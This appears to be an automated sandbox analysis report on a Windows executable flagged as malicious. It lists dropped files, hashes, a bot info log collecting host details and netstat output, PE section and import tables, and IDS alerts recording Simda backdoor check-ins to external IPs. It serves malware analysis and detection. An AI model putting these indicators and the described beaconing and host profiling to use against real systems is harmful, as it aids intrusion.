                                                                                                                                                                                                            SHA1:2A3CF01C12F247E160CAA1FC5CF7B18B3B4E55E3
                                                                                                                                                                                                            SHA-256:7C0AD49C697792818E234BA2F080FA6B6BF580BA24F54FE5D20CBADE24A15B5F
                                                                                                                                                                                                            SHA-512:2C45A52F01056561E47BDD6691FAEDEC1ED3CFBC745DA2BBDFAD4E80F17CE158E8B81F266F0EC4E0CE6DC371F0F0DCE61C17CE25FCE8968B70E3524ADB2693C0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">..<html>..<head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net">.. <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}if(!("cmp_id" in window)||window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net"}if(!("cmp_cdn" in window)){window.cmp_cdn="cdn.consentmanager.net"}if(!("cmp_proto" in window)){window.cmp_proto="https:"}if(!("cmp_codesrc" in window)){window.cmp_codesrc="1"}window.cmp_getsupportedLangs=function(){var b=["DE","EN","FR","IT","NO","DA","FI","ES","PT","RO","BG","ET","EL","GA","HR","LV","LT","MT","NL","PL","SV","SK","SL","CS","HU","RU","SR
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):114
                                                                                                                                                                                                            Entropy (8bit):4.802925647778009
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:PouVIZx/XMn30EEBuvFfD0OkADYyT0NV9kBbZWM:hax/XW3/p5mmYyT0NVuB9d
                                                                                                                                                                                                            MD5:E89F75F918DBDCEE28604D4E09DD71D7
                                                                                                                                                                                                            SHA1:F9D9055E9878723A12063B47D4A1A5F58C3EB1E9
                                                                                                                                                                                                            SHA-256:6DC9C7FC93BB488BB0520A6C780A8D3C0FB5486A4711ACA49B4C53FAC7393023
                                                                                                                                                                                                            SHA-512:8DF0AB2E3679B64A6174DEFF4259AE5680F88E3AE307E0EA2DFFF88EC4BA14F3477C9FE3A5AA5DA3A8E857601170A5108ED75F6D6975958AC7A314E4A336AED0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):173
                                                                                                                                                                                                            Entropy (8bit):4.43096450882803
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:qVoB3tUROGclXqyvXboAcMBXqWSZUXqXlIVLLP61IwcWWGpvGyy:q43tISl6kXiMIWSU6XlI5LP8IpfGpfy
                                                                                                                                                                                                            MD5:7A5DF79FBAAFF2C161C6E29461785403
                                                                                                                                                                                                            SHA1:89B90DFB141E4B0F97D15FEB34A49F9EEC64DC52
                                                                                                                                                                                                            SHA-256:B1C52A7C21C4B21BF69866D7859284068D6ECC90306FE22076F81DAA0176A7ED
                                                                                                                                                                                                            SHA-512:19F00A755F34E3770F1DD0AB698056BF60E802EE7E941662054CF61565A8C06639C3AAFE1E93B0BBF446D9F7D08F5E827648311703E8718252597B78734960A5
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>..<head><title>301 Moved Permanently</title></head>..<body>..<center><h1>301 Moved Permanently</h1></center>..<hr><center>nginx</center>..</body>..</html>..l>....0....
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:HTML document, ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):593
                                                                                                                                                                                                            Entropy (8bit):4.470551863591405
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:12:ZM1YKxs2A3aoJSw259ExxClHIlRBnNqKDuI1CA94IQL:ZM1y3aoJ7259EoolRHqFI8k4j
                                                                                                                                                                                                            MD5:3B03D93D3487806337B5C6443CE7A62D
                                                                                                                                                                                                            SHA1:93A7A790BB6348606CBDAF5DAEAAF4EA8CF731D0
                                                                                                                                                                                                            SHA-256:7392749832C70FCFC2D440D7AFC2F880000DD564930D95D634EB1199FA15DE30
                                                                                                                                                                                                            SHA-512:770977BEAEEDAFC5C98D0C32EDC8C6C850F05E9F363BC9997FA73991646B02E5D40CEED0017B06CAEAB0DB86423844BC4B0A9F0DF2D8239230E423A7BFBD4A88
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:<html>.<head>. <meta http-equiv="refresh" content="5;url=https://nojs.domaincntrol.com" />.</head>.<body>. <script>. let retries = 3, interval = 1000;. (function retry() {. fetch("https://domaincntrol.com/?orighost=" + window.location.href). .then(response => response.json()). .then(data => window.location.href = data). .catch(error => {. if (retries > 0) {. retries--;. setTimeout(retry, interval);. } else {. console.error("Error: ", error);. }. });. })();. </script>.</body>.</html>.
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):54245
                                                                                                                                                                                                            Entropy (8bit):7.858573383156463
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:sGT80eW05voD72t/7kXG+iOC+silDQ/NYUbW/:sGxeW05A7o/74COCAlvUbW/
                                                                                                                                                                                                            MD5:C82444CC66701016EAB1016D519DB00E
                                                                                                                                                                                                            SHA1:AE901B56E5E6D9CE7CBFBADE0A3E759DBC350922
                                                                                                                                                                                                            SHA-256:4A9F7A03DEA14E4687DFAA9C9A837A6FB455D7B1C3871C453093E2E17608049E
                                                                                                                                                                                                            SHA-512:31DA0D7FDE1AB157AD28D78AC31C0B215B4653A224445706654A913BFDD34910D330E289E021713751F4CB8D8588CD0EE77023F0E8DBCB3910622AD3B0AD7B53
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........3akY..R.9...........debug_17;Jan;2025_03;54;07.logUT...................0.......*q..H...Ee.m.ZUB..xX.5N..o.I..VT Z_%c.'...m2(M^.H..Ue}....9W.XW..2.t...K.lt.M.......G.w...m...'...P.......xe,...}..!q..lL...l....8v........ d....A..Yv.......6..<h...T...*?I.5v.0rC.Cd .KuXD.>!.<W..+.}.._p...z..f..6...4p11\..X.WU.U.Y....v.K...k...>y..i.....Z...$....f.n'..Z.t.w..c..j..X.L....~+.y..9.h.,%.8.6.N..){@.y8.L...9...(....5.ZUH..&...?...z..+..x.5.f...CC5/..H....2.....h.>s%$.p...]q..\e ...nE.......7..7..s+j......r..s............P".Z4z.S..x.cX'.@..x)..>.{a..7..../p..p....s..h..P.f.@.].N.l..`.....%..e.....{.K...O...7..Q:...l...PK........3akY........6.......scr.bmpUT................._..X...f.....w.^l.>.....}..7.kb.BR{.%A%..Y.u..{w6...X..sg..]=..F=.w..]...fz&..C.....f.8..6.......Tfd2!,..s....?.d.#....J.`...d*.S....O.......lnl.?...E.i...cC...............^.x.../6...>....]..].K.~.O.....ml.......K.wi..m...Vm|........|.............?....+.a.!m.H...vZ..S.....Oi....?...
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1806
                                                                                                                                                                                                            Entropy (8bit):5.36617555864784
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:uXGiOiOyvBU0zc2i2LuiVGXZVV7RY6f6yZsosrOYXfVRXJsVRXDc3xwOeiYVbUlB:uhxvRdPSF9Xy/rJ+DAxwOVG0nX7nN
                                                                                                                                                                                                            MD5:FB7F04E56B29C85B076AB8AB6D5BA6F2
                                                                                                                                                                                                            SHA1:F15E20C8FECE36B141125CE2E9B0B84F0B51D636
                                                                                                                                                                                                            SHA-256:0C6952D17D4DA62A80A012102B71588FE3138628293F9FEAF13109DA08CFEC00
                                                                                                                                                                                                            SHA-512:A708992D51BF3E48BCD6A16B4175A4D228433AC5496E2CEDF6B002BB8AB5278170DA1C231EB74B31D425F3331AE8C9DA5D44804BFE8D7824F308D1619EDE4A70
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:ExceptionAddress = C:\Windows\System32\KERNELBASE.dll!RaiseException + 0x0062..ExceptionCode = 0x0000071A.Last error: 0x00000000..Context:.Eip = 0x7566CC12 Eax = 0x06F7F8E8 Ebx = 0x00000000.Ecx = 0x00000000 Edx = 0x00253000 Ebp = 0x06F7F940.Esp = 0x06F7F8E8 Esi = 0x0000071A Edi = 0x08A38150.EFlags = 0x00000246..Main module:.main 0x02640000-0x00063000..ThreadStart = unknown!0x02656970..CallStack:.C:\Windows\System32\RPCRT4.dll!RpcRaiseException + 0x003e.C:\Windows\System32\RPCRT4.dll!RpcErrorGetNextRecord + 0x0461.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x04ea.C:\Windows\System32\RPCRT4.dll!NdrAsyncClientCall + 0x0553.C:\Windows\System32\RPCRT4.dll!RpcAsyncCompleteCall + 0x002c.C:\Windows\SYSTEM32\WINSTA.dll!WinStationRegisterConsoleNotification + 0x0422.C:\Windows\SYSTEM32\WINSTA.dll!WinStationQueryCurrentSessionInformation + 0x007a.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0ba5.C:\Windows\System32\RPCRT4.dll!I_RpcGetSystemHandle + 0x0b3d.C:\Windows\System32\R
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:PC bitmap, Windows 3.x format, 1280 x 1024 x 8, image size 1310720, cbSize 1311798, bits offset 1078
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):1311798
                                                                                                                                                                                                            Entropy (8bit):2.9635836126535775
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24576:N6IjwK5EqLSdgqDBgAhSkPXPCXJIY4GMO2S/AgPh3aFZ0yOiG5C5w8PA4ynd53Ur:N6IjwK5EqLSdgqDBgAhSkPXPCXJIY4Ga
                                                                                                                                                                                                            MD5:8E00CE6E581F0520E277B596BB317378
                                                                                                                                                                                                            SHA1:AD1EE4AE124995406C1A7B9FF99958A22777F768
                                                                                                                                                                                                            SHA-256:68D6BE02FADFBD4E3DBE7E042B9DD64136F913F1E1FAC90A87303187DEDEDC4D
                                                                                                                                                                                                            SHA-512:48C38A1DA738816E93414E4DB286E68D9237DEE8A0EA0874E29356A22203CBED867D4CF2E73E75E4A33D10806E8412D5D362C1D7E2513109A6D61A3B24418B03
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Process:C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6269
                                                                                                                                                                                                            Entropy (8bit):5.208519565706757
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:rUyRgAkZxhk23W9ainvPXLJOIvsmOFOY2iBdvO1je37Oudvm273iViqXwoNuPZlc:rjqDGfqyg2tJyNQHf/CEL/
                                                                                                                                                                                                            MD5:16063E3B32EAC077EA40ACD8A6138091
                                                                                                                                                                                                            SHA1:3C41CA345CCA04332F6D12AE373ABB8D9E37BF8E
                                                                                                                                                                                                            SHA-256:E087BA3806E3F4893196D84A9630BBA0DA7F3C874285F3E41AAE6580D04EAC04
                                                                                                                                                                                                            SHA-512:8BD7964F0E6A04E3A230DAB550ED60369C9BE8F40596D168A027E7069FE01D59406D64D55209032F089A1326EE6386E0F6DAC783D000B006260213A50D355EDC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:{BotVer: 4.1.2}.{Process: C:\Windows\apppatch\svchost.exe}.{Username: user}.{Processor: Intel64 Family 6 Model 143 Stepping 8, GenuineIntel}.{Language: ENG}.{Screen: 1280x1024@32}.{Date: 17:Jan:2025}.{Local time: 03:54:07}.{GMT: -5:00}.{Uptime: 16d 23h 28m}.{Windows directory: C:\Windows}.{Administrator: true}.IE history:.{http://go.microsoft.com/fwlink/p/?LinkId=255141}.netstat.{Proto.Local address.Remote address.State.TCP.0.0.0.0:135.0.0.0.0:0.LISTEN.TCP.0.0.0.0:445.0.0.0.0:0.LISTEN.TCP.0.0.0.0:5040.0.0.0.0:0.LISTEN.TCP.0.0.0.0:22601.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49664.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49665.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49666.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49667.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49668.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49669.0.0.0.0:0.LISTEN.TCP.0.0.0.0:49670.0.0.0.0:0.LISTEN.TCP.0.0.0.0:64111.0.0.0.0:0.LISTEN.TCP.192.168.2.9:139.0.0.0.0:0.LISTEN.TCP.192.168.2.9:49268.1.1.1.1:53.TIME_WAIT.TCP.192.168.2.9:49552.1.1.1.1:53.TIME_WAIT.TCP.192.168.2.9:49703.192.168.2.1:445.
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\uavINoSIQh.exe
                                                                                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Category:modified
                                                                                                                                                                                                            Size (bytes):211463
                                                                                                                                                                                                            Entropy (8bit):7.809238592616903
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:6144:C+EqFQ9A9ty5bhJcrs0MurPw/c4hd/B/coyXT3nOGX6T+:C+U9qyFhJy56d/eoyXjn9W+
                                                                                                                                                                                                            MD5:ACF1B66F47538D1828695BAE8D83EF23
                                                                                                                                                                                                            SHA1:E1F87EA8BA51F1C1EC2F70EC416FC0772FDD1E28
                                                                                                                                                                                                            SHA-256:D0BD2130E7D3B4A2AD87EB399992C93B177CB3959B2779C15CE7F770798145FD
                                                                                                                                                                                                            SHA-512:6D20F2BDD465AB0596C3B02120994CBA69E2130CE38241868DCA6710DB323FE58AFB3E01AC90ADE36041B4EAA1C7166AA04D1CEAC1564B591CCE01DFD5F8B64D
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~.t>.................0.......7................@..........................P.......c%.....................................a..........H....................@......................................................................................text..../.......0.................. ..`.dHGmL..=s...@.......4..............@..@.lzmjSu..............:..............@....YOSWO...O...........<..............@..@.sTDEgl.Ct...........B..............@..@.fwQO...zy...`.......J..............@..@.L...................X..............@....D.......@...........Z..............@....data....&.......(...`..............@....kubC...ma..........................@....hkw....Y....p......................@....rsrc...H...........................@..@.reloc.......@.......4..............@..B........................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\Desktop\uavINoSIQh.exe
                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):26
                                                                                                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                            Entropy (8bit):7.8092453408916285
                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                            File name:uavINoSIQh.exe
                                                                                                                                                                                                            File size:211'463 bytes
                                                                                                                                                                                                            MD5:98422c3dece103de16c166c7fbea2f6c
                                                                                                                                                                                                            SHA1:6cfcadc2ed5bb29ee8a1ff27c5b04c2481ee1e77
                                                                                                                                                                                                            SHA256:8eb3e521e20b9c7bbc6e71980c64d4a76e3db810ac2bbefec0d7780116101e70
                                                                                                                                                                                                            SHA512:d0b558128273401484f93ca8114641c4b4c3392b81f303531fa3fc38d313a481b8ca960aa82e62df622be617055829b02f1e7f0c3e412782bd65586ebccdf85e
                                                                                                                                                                                                            SSDEEP:6144:Q+EqFQ9A9ty5bhJcrs0MurPw/c4hd/B/coyXT3nOGX6T+:Q+U9qyFhJy56d/eoyXjn9W+
                                                                                                                                                                                                            TLSH:CE2412E7A7548BAAE9571633A94FC31E516853612F84E453EF01AC2D3CF06E13D7B2A0
                                                                                                                                                                                                            Icon Hash:000a5575b595b575
                                                                                                                                                                                                            Entrypoint:0x401000
                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                            Digitally signed:false
                                                                                                                                                                                                            Imagebase:0x400000
                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                            DLL Characteristics:
                                                                                                                                                                                                            Time Stamp:0x3E74BE7E [Sun Mar 16 18:12:14 2003 UTC]
                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                            OS Version Major:4
                                                                                                                                                                                                            OS Version Minor:0
                                                                                                                                                                                                            File Version Major:4
                                                                                                                                                                                                            File Version Minor:0
                                                                                                                                                                                                            Subsystem Version Major:4
                                                                                                                                                                                                            Subsystem Version Minor:0
                                                                                                                                                                                                            Import Hash:e7f2d5507b09bfb1c824fe29a99d8a60
                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                            mov eax, 00000000h
                                                                                                                                                                                                            mov edx, 0042B50Bh
                                                                                                                                                                                                            mov ecx, edx
                                                                                                                                                                                                            add ecx, 000124B4h
                                                                                                                                                                                                            push ecx
                                                                                                                                                                                                            mov dword ptr [0043D34Bh], 00000000h
                                                                                                                                                                                                            mov ecx, dword ptr [0043D34Bh]
                                                                                                                                                                                                            push ecx
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x261d4 | 0xb4 | .fwQO
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x69000 | 0x2a048 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x94000 | 0x4aa | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x383dc | 0x1c | .D
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x2fd9 | 0x3000 | d73d0e281626fbb3ecec77d2e8aa1769 | False | 0.7303059895833334 | COM executable for DOS | 6.420148786453065 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.dHGmL | 0x4000 | 0x733d | 0x600 | 146ba48b12ddc4d87c37c42526e6cd84 | False | 0.181640625 | Matlab v4 mat-file (little endian) \333_^\020U, numeric, rows 0, columns 0 | 1.4859327833763099 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.lzmjSu | 0xc000 | 0xc1af | 0x200 | 61af0c0d83c1325686ba8762e3e8d981 | False | 0.40234375 | data | 2.787352355338978 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.YOSWO | 0x19000 | 0x4ff9 | 0x600 | 8f3ef2f627573ad2dcb3e05b99ae413b | False | 0.5924479166666666 | data | 4.742875837921052 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.sTDEgl | 0x1e000 | 0x7443 | 0x800 | 3a8e8bd0335dc84a50fc5c79b67c3d0a | False | 0.60009765625 | data | 5.035390472599325 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.fwQO | 0x26000 | 0x797a | 0xe00 | e879e25bdf58f45d60295218e86bc236 | False | 0.4361049107142857 | data | 4.86580950341829 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.L | 0x2e000 | 0x978e | 0x200 | 010aea57b2cd53e20b70dee59aedc905 | False | 0.640625 | data | 4.558249274598118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.D | 0x38000 | 0x401a | 0x600 | c2b33e6b4777caf26721728b1213be8b | False | 0.57421875 | data | 4.666855552838835 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x3d000 | 0x2691 | 0x2800 | f66ee5f77d63a2d0f55a13b4aab8b246 | False | 0.84580078125 | data | 7.005203294431193 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.kubC | 0x40000 | 0x616d | 0x400 | 0fc3d2bf5e87a10e3ed265156ec1b7b7 | False | 0.2353515625 | Matlab v4 mat-file (little endian) \316, numeric, rows 0, columns 0 | 1.822118650991909 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.hkw | 0x47000 | 0x21b59 | 0x600 | 1427a6ec5060bd3a64df6cc9b4758b57 | False | 0.15494791666666666 | data | 1.2660415037779147 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x69000 | 0x2a048 | 0x2a200 | 5363093beaf747e12444bb8e872dcf11 | False | 0.9833028097181009 | data | 7.981989177826033 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x94000 | 0x4aa | 0x600 | 6af87ce341dd6bf5cc992452b47fea53 | False | 0.7565104166666666 | data | 6.20097753724165 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x69178 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.41627579737335835
RT_DIALOG | 0x6a220 | 0x3a | data | English | United States | 0.9827586206896551
RT_RCDATA | 0x6a25c | 0x28b94 | data | English | United States | 1.0003656986643006
RT_GROUP_ICON | 0x92df0 | 0x14 | data | English | United States | 1.1
RT_VERSION | 0x92e04 | 0x244 | data | English | United States | 0.5431034482758621
DLL | Import
KERNEL32.DLL | DosDateTimeToFileTime, GetSystemDirectoryW, WriteFile, GetProcAddress, CreateFileA, GetModuleHandleA, CreateDirectoryA, FileTimeToSystemTime, IsBadStringPtrA, GetSystemDirectoryA, GetTimeFormatA, lstrcpyn, LocalAlloc, OpenWaitableTimerA, EnumCalendarInfoA, GetNamedPipeInfo, IsValidCodePage
USER32.DLL | EnumChildWindows, GetSysColor, DialogBoxParamA, CreateMenu, EnumDesktopsA, GetClassNameA, CharNextA, ReleaseDC, RegisterWindowMessageA, EnumWindows, InvalidateRgn, SetWindowLongA, ShowCursor, CreateAcceleratorTableW, GetCaretPos, SetFocus, UnregisterClassW, PeekMessageW, SetMenu, GetMenuItemInfoA, LoadImageA, SendMessageW, DialogBoxIndirectParamA, CopyRect, GetWindowRect, GetScrollPos, CopyImage, GetSysColorBrush, PostQuitMessage, CheckDlgButton, GetDC, IsWindowEnabled, FillRect, CharLowerA, CreateDesktopA, UpdateWindow, SetCapture, SendDlgItemMessageW, LoadBitmapW, CreateWindowExW, GetDlgItemTextA, DefDlgProcA, GetKeyboardType, DefWindowProcW, CloseWindow, DestroyIcon, SetActiveWindow, CharUpperW
gdi32.dll | GetPixelFormat, GetMetaRgn, GetEnhMetaFilePaletteEntries, GetWorldTransform, GetTextExtentExPointA, GetPath, GetLogColorSpaceW
advapi32.dll | RegOpenKeyExA, RegCreateKeyExW, RegCloseKey, RegDeleteValueW, RegReplaceKeyA, RegEnumValueA
shell32.dll | StrCmpNIA, StrRStrA, StrStrIA
WINSPOOL.DRV | EnumPrinterDataA, AddPortW, DocumentPropertiesW, GetJobA, ConfigurePortA, AddMonitorA, EnumPrinterKeyA, EndPagePrinter, DocumentPropertySheets
INETCOMM.DLL | MimeOleConvertEnrichedToHTML, MimeOleSMimeCapInit, MimeOleGetBodyPropW, MimeEditViewSource, DllGetClassObject, MimeOleCreateMessageParts, MimeOleCreateBody, HrGetDisplayNameWithSizeForFile, CreateIMAPTransport, HrFreeAttachData, HrGetLastOpenFileDirectoryW, MimeOleGetCodePageCharset, MimeEditDocumentFromStream
CRYPT32.DLL | CryptSignCertificate, CertCreateCRLContext, CryptMsgOpenToDecode, CertIsValidCRLForCertificate, CryptGetOIDFunctionAddress, CertAddEncodedCertificateToStore
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-11T18:07:37.529053+0100 | 2021022 | ET MALWARE Wapack Labs Sinkhole DNS Reply | 1 | 1.1.1.1 | 53 | 192.168.2.9 | 55552 | UDP
2024-11-11T18:07:38.142480+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56860 | 3.94.10.34 | 80 | TCP
2024-11-11T18:07:38.149523+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.9 | 56860 | TCP
2024-11-11T18:07:38.149523+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.9 | 56860 | TCP
2024-11-11T18:07:38.533489+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56861 | 23.253.46.64 | 80 | TCP
2024-11-11T18:07:38.535087+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56864 | 99.83.170.3 | 80 | TCP
2024-11-11T18:07:38.775166+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56869 | 18.208.156.248 | 80 | TCP
2024-11-11T18:07:38.813587+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56865 | 188.114.96.3 | 80 | TCP
2024-11-11T18:07:38.823176+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56870 | 44.221.84.105 | 80 | TCP
2024-11-11T18:07:38.828867+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 44.221.84.105 | 80 | 192.168.2.9 | 56870 | TCP
2024-11-11T18:07:38.828867+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 44.221.84.105 | 80 | 192.168.2.9 | 56870 | TCP
2024-11-11T18:07:38.831305+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56871 | 44.221.84.105 | 80 | TCP
2024-11-11T18:07:38.878019+0100 | 2804852 | ETPRO MALWARE Backdoor.Win32/Simda.gen!A Checkin | 1 | 192.168.2.9 | 56872 | 208.100.26.245 | 80 | TCP
